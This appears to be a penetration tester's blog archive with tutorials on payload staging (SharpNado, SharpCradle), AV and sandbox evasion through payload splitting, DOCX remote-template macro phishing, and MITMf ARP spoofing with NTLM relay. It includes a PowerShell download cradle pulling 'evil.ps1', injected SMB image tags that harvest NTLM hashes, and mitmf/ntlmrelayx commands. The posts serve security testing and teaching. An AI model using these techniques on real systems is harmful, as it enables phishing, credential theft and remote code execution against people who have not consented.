Wednesday, December 19, 2018

SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads


I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was on accident and I will gladly make any updates if needed.  This is intended for educational purposes only.


SharpNado is proof of concept tool that demonstrates how one could use .Net Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a full functioning, robust, payload delivery system nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let's just say one of its use cases is it allows two applications living on different systems to share information back and forth with each other. You can read more about them here:


.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, it allows us to build in logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can still stay small and flexible but we can also build in complex rules server side that allow us to change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic, if domain user equals X fire and if not don't.  While this doesn't seem very climatic, you could easily build in more complex rules.  For example, if the domain user equals X,  the internal domain is correct and user X has administrative rights, run payload Y or if user X is a standard user, and the internal domain is correct, run payload Z.  Adding to this, we could say if user X is correct, but the internal domain is a mismatch, send back the correct internal domain and let me choose if I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let's talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable or often they use a staged approach where the non-malicious stager reaches out to the web, retrieves our malicious code and executes it as long as environmental variables align.  The above examples are fine and still work well even today and I am in no way tearing these down at all or saying better ways don't exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch between what the stager will execute.  We can do this either by back-end server logic as discussed above or by quickly setting different payloads within the SharpNado console.  So, let's say our first payload gets blocked by endpoint protection. Since we already know our stager did try to execute our first payload due to the way the stager/server communicate we can use our deductive reason skills to conclude that our stager is good but the malicious code it tried to execute got caught. We can quickly, in the console, switch our payload to our super stealthy payload and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload which got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that I could do all this with mod rewrite rules and while that is absolutely true, mod rewrite rules can be a little more complex and time consuming to setup.  This is not meant to replace mod rewrite or anything.  Long live mod rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow easier to follow rules, modularization, and data parsing/presentation.

4. Payloads aren't directly exposed:

What do I mean by this?  You can't just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute along with any complex logic we want to run sits behind our remote server interface.  That remote interface exposes only the remote server side methods which can then be called by your stager. Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works.  As there are many people who explain it and understand it better than I ever will.

Keep in mind, that you would still want to encrypt all of your payloads before they are sent over the wire to better protect your payloads.  You would also want to use other evasion techniques, for example, amount of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around awhile:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.


Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz logonpasswords function.  First, we will setup our XML payload template that the server will be able to use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already setup that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload setup, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and setup our listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080.  So, our stager should be setup to connect to  I would like to note two things here.  First is that with a little bit of work upfront server side, this could be modified to support HTTPS and secondly, SharpNado does not depend on the templates being setup prior to running.  You can add/delete/modify templates any time while the server is running using whatever text editor you would like.

Now let's see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.

In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command "show payloads" and if your payloads show up, you know you set it correctly.

Lastly, we will setup our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe but this could be delivered via .NetToJavaScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the "run" command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure again, that everything is setup correctly.

Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.

Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1 and when we run the same exact stager again, we instead will show our ipconfig information.  Again, this is only for simple demonstration of how you can quickly change out payloads.

Simple sandbox evade example:

In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from or previous example, all we need to do is set our payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don't hit our correct target.

Looking at our simple stager example below we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service or a 0 will be sent if the user isn't anthem.  Please keep in mind you could however send back any information you like, including username, domain, etc.

Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and depending on threshold kill the service.  This would be an example of building in counter measures if we think we are being analyzed and/or sand-boxed.

Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.

Now if I change the user to anthem2 and go through the process again.  We can see that our non-malicious payload fires.  Keep in mind, the stagers could be setup in a way that values aren't hard coded in.  You could have a list of users on your server and have your stager loop through that list and if anything matches, execute and if not do something else.  Again, it's really up to your imagination.

Compile source code on the fly example:

Let's do one more quick example but using C# source code.  This stager method will use System.CodeDom.Compiler which does shortly drop stuff to disk right before executing in memory but one could create a stager that takes advantage of the open source C# and VB compiler Roslyn to do the same thing.  This doesn't touch disk as pointed out by @cobbr_io in his SharpShell blog post.

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:

Then we will setup our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.

Now when we run our stager, we should see our ipconfig output.


Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado -

SharpNado Compiled Binaries -

SharpSploitConsole -

SharpSploit -

Wednesday, December 5, 2018

Evading Sandboxes and Antivirus Through Payload Splitting

Malware has been using the Temporary Internet Files folder structure as a launching point for the past 20 years, but from an offensive standpoint I haven’t seen too much else that leverages the quirks and functionality it can provide.  A few weeks back during an engagement I was on, I noticed the wide variety of filetypes present in the folder structure that appeared to be directly downloaded from the internet and were in no way were obfuscated, compressed, or restricted.  Due to a few other projects I was working on at the time, I started thinking to myself about the potential implications of this, as well as the limits to which it could be taken.  The result of this research was the discovery of a technique of splitting payloads to evade antivirus and sandboxes, as well as provide a potential new method for payload encryption / environmental keying.  

As a part of penetration tests I find myself more often hosting payloads on a third-party site and then sending a link to the site in the phish, versus simply including the payload as an email attachment.  This is due in a large part to the numerous steps taken by organizations in recent years to restrict and inspect the files entering their network in this manner.  However, as the end user is now visiting a site I control as part of the phish, this provides a new opportunity to transparently download code onto their system in the Temporary Internet Files folder structure via an I-frame, as well as deliver a traditional payload.  We can then code that payload to not execute anything malicious itself, but rather search the local file system and execute instructions / compile from the code located in the user’s temporary internet files.  This technique can evade antivirus as on their own neither file is considered to be malicious, and evades sandboxes as the appliance will not have visited the same page the user did, and thus will not have a copy of the code pulled via the I-frame.  Below, I discuss an in-depth walkthrough of the setup and operation of this vector.

A Background on Temporary Internet Files and Caching

‘Temporary Internet Files’ (INetCache in Win10) is a user-specific folder located in %userprofile% \appdata\local\microsoft\windows which acts as the repository for files download while browsing the web with Internet Explorer (Edge uses a similar method for temporary file storage, but has a separate directory structure).  Although these files appear to be in a single folder when browsed through the GUI and browser, in reality they exist in a variety of randomly named, system-generated folders that lie several directories deeper in the folder structure.  Files stored in this structure are cached to decrease required network demand and allow sites to load more quickly.   Chrome and Firefox store their temporary internet files in a compressed format, making them less accessible than those downloaded through IE.

The server typically controls caching, and as we will see later it can set varying lifetimes for resources before the client requests them again.  This makes sense as some resources (such as a corporate logo or a video embedded on a website) rarely change, and thus can be downloaded periodically rather than every time the site is loaded.  However, this means that the client is downloading code to their local disk from a remote location without any prompts or warnings to the end user.  This by itself does not represent a security risk, and clicking through to accept a huge number download requests on every site you visit would get old extremely quickly.  Rather, it is the way that IE and Edge cache flat files in a (relatively) easily findable location that initially caught my attention, as I found I could coerce a download of a file from the server to the client, and subsequently access a fully readable copy sitting in the previously mentioned folder structure on the client’s system.

Setting up Apache

In order to get files downloaded onto client systems connecting to us we first need to set up our server to add the requisite headers to our traffic.  Luckily, Apache has pre-built modules that helip us do exactly what we need.  Using a standard Ubuntu / Debian box we enable mod_headers and mod_expires (through a2enmod headers & a2enmod expires, respectively).  From there we modify our virtual host file (in /etc/apache2/sites-available/) to include the necessary rules (in this example we’ll be using a .xml file to host code to be compiled on the client system):

Really all this does is say that any .xml file that is served should have a cache-control header set on it, with an expiration of 604800 seconds (one week) from when it is downloaded.  This means that if the browser attempts to access the site again, it will perform a delta on the timestamp on the initial file and if it is less than one week old, will not request an updated version of the file from the server.  Performing a curl of a resource with cache control set up for it and comparing against one that does not (such as a .html file) shows us that our configured rules are working as intended:

Building Hosted Files and the Landing Page

Before we can configure our landing page we need to set up a hosted file that will be dropped onto the client’s system and determine what we want it to do.  IE is typically pretty open with the types of files it will automatically download, and I’ve had success with a variety of file extensions (.vbs, .ps1, .xml, etc.).  However, in our example we’ll be using an MSBuild-compatible .xml stager that contains C# source code, which when built will in turn grab a second-stage assembly from a remote webserver and execute it in memory.  An example of the general outline of this stager code can be found here: We’ll run this code through VT and make sure we’re not going to get picked up immediately:

We’ll next need to create a payload that the user will download to begin the execution chain.  For this example, we’ll use a basic .hta file that contains some vbscript code which searches for our file within the known Temporary Internet Files directory structure, and will use msbuild to compile & run our source code if it is found.  In practice, this could be any of a wide variety of payloads already utilized in traditional phishing attacks, but with the added benefit of splitting code to further evade detection.  One important thing to note, as we’re searching based on the name of our .xml file written to disk, using a unique or sufficiently long randomized string is recommended.

Now that we have our hosted files set up, we can move into building the actual server-side infrastructure of a landing page that will host them.  In our example we have an extremely simple page that hosts a file download and also contains the hidden I-frame that loads our .xml payload file, which if configured correctly should cause the c# source code hosted in the .xml file to be downloaded to the client system. 

In a real-world scenario I would likely include the I-frame on the initial landing page (ex. page requiring a user login to access a secure email) and host the actual file download on a separate page.  This can also be accomplished through the usage of an html redirect on the landing page.  However, this will be all we need for a demo, and we should now have our server ready to go and deliver both our source code files as well as our selected payload.

Putting It Together

Now that we have an understanding of the process behind the attack, we’ll run through an example demoing the full execution chain on a fully patched Win 10 box, to see how we can gain execution of an arbitrary C# assembly hosted on an external website from our initial HTA download.  Lets first browse out to the web page we set up on our server (pretending that we received a phishing link directing us to this site):

Cool, nothing too crazy going on right now on the web console, I see the link to the download of the .HTA file we'll use for first-stage execution, but that's about it.  Lets take a look and see if our I-Frame functioned as intended to download the linked .xml file to disk:

Looks like it was successfully downloaded, now lets quickly just validate our code is actually in there:

So we now have our c# code sitting in a .xml in a fairly easy-to-find spot on the disk, lets execute our .hta payload from the website and see what happens:

Awesome, we got code execution from our second-stage assembly that was hosted on a remote server.

Concerns and Additional Uses

In the process of researching this I stumbled upon several items that I wanted to mention in addition to the walkthrough given above.  First, several of my colleagues raised the extremely valid concern of browser compatibility.  After all, it is not a guarantee that users will visit your website with IE, and may instead be using Chrome, Firefox, Edge, etc.  The best answer here lies with Apache’s mod_rewrite functionality.  An inspection of the connecting user agent will allow your server to determine which payload to serve, and to either redirect those connecting with non-compatible browsers to either a splash page saying the site is only viewable in IE, or to present them with a different payload not dependent on this technique.  It is also worth mentioning that this technique is fully compatible with the Edge browser (if anyone happened to be using it), but that as it uses a separate directory structure from IE, unique payloads will need be created or a single payload that searches both trees will need to be built.

Secondly, a topic that was not touched on but may also be of interest is the applicability of this technique to payload encryption and environmental keying. Rather than an iframe coercing a file download containing code to execute, it could simply contain a decryption key.  As this file would only be present on the system that browsed to the site containing the I-frame, the payload could not be decrypted elsewhere, even by another system on the same domain, or logged into by the same user.  The encrypted payload would perform a function similar to the vbscript payload shown above, in that it would simply search for a file with a specific, pre-determined name and attempt to extract the extract the decryption key.  If successful the primary payload would decrypt and execute.

Finally, although all demos were done on an internal lab range, the process has been tested repeatedly over the internet from several cloud-hosted boxes with success on all stages of the process.


This was a very simple example of a payload that could be built from two separate files and combined into an effective attack vector.  I’m sure that there are way cooler ways to utilize this and make more effective payloads, from something as simple as scripting cleanup of the initial stager files from the disk upon successful execution, to payload encryption and staging of complex project through multiple files dropped to disk.

Wednesday, October 24, 2018

SharpCradle - Loading remote C# binaries and executing them in memory


I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was on accident and I will gladly make any updates if needed.  This is intended for educational purposes only.


Over the last 4-5 years I have dabbled with using C# for offensive purposes, starting first with running Powershell via C# runspaces and then slowly digging into other ways you could use the language offensively.  This eventually led to an idea a few years ago of attempting to write a post exploitation framework all in C#.  Unfortunately, no one told me that trying to write a full functioning post exploitation framework by yourself was not only extremely time consuming but also extremely hard.  So I decided it would be much easier to release small tools that have the functionality of some of the modules I had been working on, the first release being SharpCradle.

What it does:

SharpCradle loads a remote C# PE binary from either a remote file or web server using the file / web stream classes (respectively) into a byte[] array in memory.  This array is then executed using the assembly class.

How this could be useful:

SharpCradle isn't exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ) but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.


This does not work for ALL binaries but only those written using managed code, such as C# or Visual Basic .NET.

Short example:

Since my good friend @g0ldengunsec and I just released SharpSploitConsole v1.1, which takes advantage of the awesome tool SharpSploit written by @cobbr_io, I will be using it as my "evil.exe" program that we will pull into memory using SharpCradle.

By running SharpCradle.exe without any arguments, you will see the below:

By simply running SharpCradle.exe with the -w flag and giving it the web address of SharpSploitConsole_x64.exe with arguments, you will see that we are able to execute SharpSploitConsole in memory without the SharpSploitConsole binary ever touching disk.

An example of downloading the binary into memory and executing the function logonpasswords from mimikatz would look like the below:

Since SharpCradle also has the ability to retrieve binaries from a file share, we could,  for example, use Impacket's to spin up a quick anonymous file share on our attack system and call our evil.exe from there.  We could also go as far as to combine this with post exploitation frameworks. Cobalt Strike's execute-assembly function currently has a 1MB limit.  SharpCradle could be used as away around this by using Cobalt Strike to execute SharpCradle to pull in larger binaries that are over 1MB in size.

Lastly, I have left a few links to where you can grab the tool as well as stand alone .cs files for both web stream or file stream in case you want to customize your own.

Link to tools:

SharpCradle GitHub -

SharpCradle Compiled Binaries -

SharpCradleWeb.cs -

SharpCradleFileShare.cs -

SharpSploitConsole -

SharpSploit -

Wednesday, July 18, 2018

Executing Macros From a DOCX With Remote Template Injection

The What:

In this post, I want to talk about and show off a code execution method which was shown to me a little while back. This method allows one to create a DOCX document which will load up and allow a user to execute macros using a remote DOTM template file. This attack has been seen in the wild, is partially included in open-source offensive security tools, as has been blogged about by Cisco Talos, but in the blog post and the open-source tool, it is only seen as a credential stealing attack typically over the SMB protocol. This blog post will detail how to use this method to download a macro-enabled template over HTTP(S) in a proxy-aware method into a DOCX document.

The Why:

The benefit of this attack versus a traditional macro enabled document is multidimensional. When executing a phishing attack against a target, you able to attach the .docx directly to the email and you are very unlikely to get blocked based on the file extension. Many organizations block .doc or .docm but allow .docx because they are not supposed to be able to contain macros.

Another reason this attack will likely land more often is because the attachment itself does not contain malicious code. The macro itself is not seen by any static email scanners so it is less likely to be blocked. In the event that your target uses a sandbox to detonate email attachments, you can use various sandbox evasion techniques such as modrewrite rules or IP limiting to prevent the sandbox from being able to pull down the malicious template. @bluescreenofjeff has a wonderful guide on creating modrewrite rules for this type of evasion in his Red Team Infrastructure Wiki 

The How:

To start this attack, we need to create two different files. The first will be the macro-enabled template, or .dotm file, which will contain a malicious VBA macro. The second will be the seemingly benign .docx file which contains no malicious code itself, only a target link which points to your malicious template file.

Getting Started:

In my blog posts and trainings that I provide to others, I aim to show examples using free and open-source tools. I do this because I want anyone reading this blog to be able to try it on their own (always against their own systems or systems which they have permission to try it on) and do not want to force people into purchasing commercial tools. For this reason, I will walk through the steps for creating the remote template document to execute a PowerShell Empire payload. To keep to the purpose of this post, I won’t detail out how to create the listener or the macro for Empire here. There are many tutorials out there on how to do this already. I will just walk through creating the documents to execute the macro.

Creating the Macro-Enabled Template:

For this attack to work, we need to create a macro-enabled Word template (.dotm file extension) which contains our malicious Empire macro. Open up Word and make the Developer tab on the ribbon visible:

Then open up the Visual Basic editor from the Developer tab and double-click on ThisDocument under the current project to open up the code window. Paste in your macro code into this window:

Give the template a name and save the file as a .dotm format. Please note that the name is usually briefly visible to the user, so I recommend something seemingly benign such as ‘InvoiceTemplate.dotm’:

Since I am just using the default macro from PowerShell Empire, it quickly is picked up by Windows Defender, so I am going to disable it for the demo. If your target uses Windows Defender, you will need to pick a different tool or perform obfuscation until you can get a working macro.

At this point, I tend to like to validate my template and macro by just double-clicking on the document and making sure that I get the ‘Enable Content’ button and that I get an agent when I click on it:

It works!

Creating the Remote-Template-Loading Document:

With the template working, we now need to create a .docx file that will download and load in the template from a remote resource. The easiest way in which I have found to do this is to create a .docx document from one of the provided Word templates, then just modify the target:

Modify the document as necessary to meet your phishing scenario in order to get your target user to click the ‘Enable Content’ button if it shows up for them. Save your document in the .docx format.

Next, find the document and right-click and rename the extension on the document from .docx to .zip. Extract the contents of the zip file to a folder and browse to that folder.

Note: With the release of Office 2007, Microsoft introduced the formats that end in an ‘x’ character. Each of these formats are just zip files containing mostly .xml and .rel files. You can manually edit the document and its properties by changing these files then re-zipping the contents.

Navigate to the ‘.\word\_rels\’ folder and open up the ‘settings.xml.rels’ file using a text editor such as Notepad:

The Relationship tag containing a Type with attachedTemplate will be the setting that tells Word where to load in your template from when you open that .docx. Currently, this is loading in a template from the local file system:

The key is that this value will accept web URLs. We can modify the Target value to be a remote location. In this case, I host my macro-enabled template on GitHub:

Once we save this file, we can zip the contents back up and rename the file back to a .docx. The next time that we open up our .docx, we can see that the file is reaching out over HTTPS to our hosting service to download the template:

And now our .docx file has a macro loaded in it and is allowed to run macros:

There is a new pop-up to the user, but it does not affect the payload. This is just due to the fact that .docx files are not intended to contain macros. If the user clicks ‘Enable Content’ or has macros set to run automatically, then we get our agents:

Now prep your phishing email, send the .docx to the user, and wait for the call backs!

Friday, August 18, 2017

NTLMRelayX and MITMf


Recently I have been playing around with the Man-In-The-Middle Framework (MITMf) and have found it to be the most successful tool for me to use on internal penetration tests and significantly more reliable than similar spoofing tools such as Ettercap. MITMf is a modularized framework written in Python which is capable of both establishing MITM attacks and utilizing them in very productive ways. The built-in modules make performing complicated MITM attacks extremely simple with things such as SMBAuth, BeEF injection, MSF’s BrowserSniper, BDFProxy, NetCreds, Responder, etc. Outside of just this combination, I highly recommend over any other MITM tool. Learn it, use it, live it.

There are a lot of people who use tools such as Responder to trick systems into sending NTLM credentials then relaying them with SMBRelayX (if you aren’t already doing this on internals, get on it). Although highly successful, it is quickly becoming more and more difficult to pull off as a pentester. If you were not aware, Microsoft basically killed off the success of Responder with MS16-077 by disabling NetBIOS-NS by default. This allowed us to impersonate systems to other systems on our local subnet and capture NTLM hashes. In situations where the client has not applied this patch (or re-enabled the hardened settings) and these users have administrative rights, you could get lucky and choose to try to relay those credentials to a system where the connecting user is an administrator, but in my experience that is rare and is more successful in the environments which have 10 other ways in. My goal was to rely on similar methods but reduce or eliminate the luck required to pull of this type of attack.

The first step in eliminating the luck is to become less reliant on Responder and the way that it works. This tool requires systems to be broadcasting and looking for certain systems via NetBIOS-NS or LLMNR. If the client has patched MS16-077, this is unlikely to happen for you. Another way to force users to connect to you and send NTLM hashes is with crafty thinking, terrible programming on Microsoft’s end, and the wonderful MITMf tool. I will discuss in detail how the module works later in this guide but there is a module called SMBAuth which injects HTML tags into cleartext HTTP traffic (or successfully MITM’d SSL/TLS traffic) which can cause Internet Explorer or Microsoft Edge browsers to establish SMB connections to your system. They will automatically send you the authentication information of the current user! New way to get those hashes.

The second step in eliminating luck is not relying on successfully cracking password hashes. SMBRelayX is a great tool for this as it can take the hash received, and relay it to a system on the network of your choosing to attempt to authenticate as that user. The key here is it will relay it to a system. If the user is not an administrator of that specified system, you will not be able to execute code and you will be very limited if you can do anything at all.

My suggested approach to avoid having to crack passwords and not being restricted to guessing which systems a user might be admin on, is to use an Impacket module which is very similar to SMBRelayX but supports relaying in a round-robin format to multiple hosts, NTLMRelayX. This tool will accept a list of hosts as an input and with each connection, it will attempt to relay credentials to the next host in the provided list. If we point it to every accessible Windows host in the environment and MITM long enough, we will execute code on any machine that the user has local administrative access on*.

The rest of this guide will provide details on setting up, executing, and understanding these tools as well as some insight into some of the mitigations which clients can implement to help prevent these attacks.

Notes to the reader: There are two things that I cannot stress enough, how powerful and important MITM attacks are, and how dangerous MITM attacks are if executed improperly. I encourage anyone reading this that wishes to execute this in a client environment to do so, but only after you have tested the tools in a practice environment, are very comfortable with how the tools work, and have enough of an understanding to troubleshoot the tools and quickly recognize issues. We are all prone to mistakes and even I have caused significant outages doing attacks such as ARP spoofing, but the more you know about how a tool works and the more care you take with the tools you are using, the less likely you are to bring down the networks that you are testing against. Always check your targets! Do not MITM large sets of hosts. Use focused attacks and take the time to review traffic. Understand who you are targeting in an MITM attack before executing. Use common sense. It has been a long time since I have caused any significant issues with MITM attacks and 75-90% of my clients never notice the attack. If executed right, it is a powerful and stealthy attack in most environments. Also, my last note is more of a pro tip: always run Wireshark (or similar packet capturing tool) when doing MITM attacks. This allows you to go back and look at the information that you captured in the MITM attack. Sometimes this is extremely relevant and if you don’t capture it, it may be gone forever.

*Sure there is some luck as the user might not have local admin anywhere but I am just going to ignore that because 99% of the time, they are local admins somewhere. Also, if the system is properly patched and they are a local admin on their own system, Microsoft has prevented relaying to the same host initiating the connection, so you won’t be able to pop their own workstation.


Pulling off this attack requires two tools which are either installed by default on Kali or available via an apt-get but both sadly do not work directly out of the box. I have provided a few details in this section which will help you get started with these tools. Additional details can be obtained by reaching out to me.


I recommend downloading this tool to the /opt/ folder on your testing system and following the install instructions they provide. A simple apt-get install on Kali does not work. The setup instructions include creating a virtual environment for Python because there are some dependencies on older Python libraries. Replacing these libraries with the older version for the default Python environment may break other tools on your system. One note that they do not include is how to get back to leave a virtual environment or how to get back into one. The github for this project can be found at with the installation instructions at

Entering an already created virtual environment:
To enter an already created virtual environment, you would use the “workon” command. For example, with MITMf, you would type on the command line:

#workon MITMf

Exiting a virtual environment:
To exit the current virtual environment, you can type ”deactivate” and it will bring you back to a standard shell which will use your system’s default Python environment.


By default, this tool is installed on Kali in /usr/share/doc/python-impacket/examples/, but sadly is missing required dependencies, some of them are older Python libraries. I have not found any guides on getting this setup, so I will detail some steps here.
This tool is dependent on the ldap3 version 1.4.0 library which is not the current version, nor the current version installed on Kali by default. To prevent breaking other tools in Kali which rely on newer version of this library, I recommend setting up another virtual environment to use this tool in. To do this (assuming you went through the steps to setup MITMf and have virtual environments properly setup for that tool), we must first create the virtual environment:

#mkvirtualenv ntlmrelayx –p /usr/bin/python2.7

Once inside a new virtual environment, we have little to no Python libraries installed. At the time of this writing, I had to install the following libraries:

  • impacket
  • pycrypto
  • pyopenssl
  • ldap3==1.4.0
  • ldapdomaindump

I installed each of these using the following command:

#pip install [library name]

The last trip-up I had with this tool is that it is not written to be able be run in a virtual environment and takes some small tweaking to actually work here**. We need to change the shebang line from “#!/usr/bin/python” to “#!/usr/bin/env python2.7” to get it to work properly in the virtual environment that was just created. I recommend creating a backup of the original before making an modifications. Once this is done, the tool should function as intended without causing issues to other tools on your system. Keep in mind that each time you go to use this tool, you will have to make sure to enter your virtual environment and run it from within this environment.

** Huge thanks to Andy Bard for teaching me something new about Python and the difference between #!/usr/bin/python and #!/usr/bin/env python2.7 and helping me to get this tool to work in a virtual environment! I would still be breaking things on my system without this knowledge.

MITMf and SMBAuth:

Once we have all of the tools setup on our system we can start the actual attack. The first part of the attack requires us to establish a MITM connection between one or more targets and their gateway so that we can observe and manipulate their traffic. The most successful method I have found with this is to use ARP spoofing against 1-5 workstations on your local subnet. I am not going to dive into the risks of ARP spoofing or techniques for selecting targets here, but I will state that you should be careful of what/who you MITM and how many systems you MITM at a time.

The first step with any tool should almost always be the help command. First switch to the directory in which you installed MITMf (probably /opt/MITMf/) then run “./mitmf --help” to see the available switches and how to use them. With MITMf, we let the tool know that we want to do ARP spoofing with the “--spoof --arp” arguments. If we don’t want to use gratuitous ARP, we can use “--spoof --arp --arpmode rpy” if we only want to reply to ARP requests rather than initiating them ourselves. This method can be slightly more stealthy but usually less efficient.

While we are in a position to observe and control traffic, we can tell MITMf to automatically identify plaintext HTTP traffic and automatically inject HTML code into any identified traffic. In some situations this can be JavaScript to steal cookies or hook BeEF, but in our situation we want to force the user’s browser to authenticate to use using SMB so we will use the “--SMBAuth” switch.

In total, we would run the following command from our MITMf virtual environment:

#./mitmf --spoof --arp --SMBAuth -i [interface] --gateway [gateway IP address] --targets [list of target hosts, comma separated, accepts things such as]

Executing MITMf in a lab environment against a single target Windows 7 workstation with IP of

MITMf automatically injecting SMBAuth HTML payload into cleartext HTTP traffic

This switch will exploit functionality built into Internet Explorer and Microsoft Edge to render images on a file share. We trick the browser into thinking that there are images available on a file share and tell it that the file share is located at our IP address. Without any other tools, this will detect the SMB connection and capture the NTLM hashes. For the purposes of this guide, we don’t care to capture the hashes, we would rather relay them to our targets. For more details on this, skip down to the NTLMRelayX section of this guide. For more details on how the SMBAuth works, see below.

Workings of SMBAuth:

The SMBAuth module built into MITMf works by observing network traffic and looking for cleartext HTTP traffic, specifically the “</body> tag. If it finds this tag, it will replace it with multiple image tags followed by the original close body tag. Below is a simple example of a server responding with HTML code and the HTML code that would be injected for an attacker machine with the IP address of Injected code is bolded.

<title> Hello World </title>
Hello World
<img src=”\\\image.jpg”><img src=”file:////\image.jpg”><img src=”moz-icon:file://%5c/\image.jpg”/></img></img></body>

Using view-source to look at the returned HTML code when hit by an MITM attack using Internet Explorer on Windows 7

These various image tags tell Internet Explorer and Microsoft Edge to make an SMB connection and provide NTLM credentials to the target host to download the image.jpg file. For an attacker, this is wonderful, an end user, terrible. As an attacker, we are able to leverage the NTLMRelayX tool detailed below to relay the authentication information received to multiple systems on the network and execute on any system on which the MITM’d user has administrative credentials and does not have SMB signing enabled.

NOTE: Although I put these two tool execution descriptions in this order, they must actually be run in reverse to work properly. You must first execute NTLMRelayX in one shell, then kick off the MITM attack using MITMf next. MITMf will start an SMB server by default (even with no modules loaded, check out the main function yourself) so running this will lock up TCP port 445 and NTLMRelayX will not be able to start. MITMf will still run properly (for the purpose of this attack) if it cannot bind to that port because NTLMRelayX is already running.


For those of you who are familiar with SMBRelayX, NTMLRelayX should not look or feel much different at all once you have the dependencies taken care of. This tool will listen for NTLM connections and relay them to a list of specified hosts. We use the “-tf [host list]” to define a file containing a list of hosts to target. We can optionally set the “-w” flag which, if enabled, will check the file provided in the –tf argument for updates and add new targets as the file changes. In cases where you are doing testing or you have not enumerated all accessible Windows systems, this can be a useful switch.

Creating a target list with one IP per line to use with the ‘-tf’ switch

Running NTLMRelayX with the –tf and –w switches

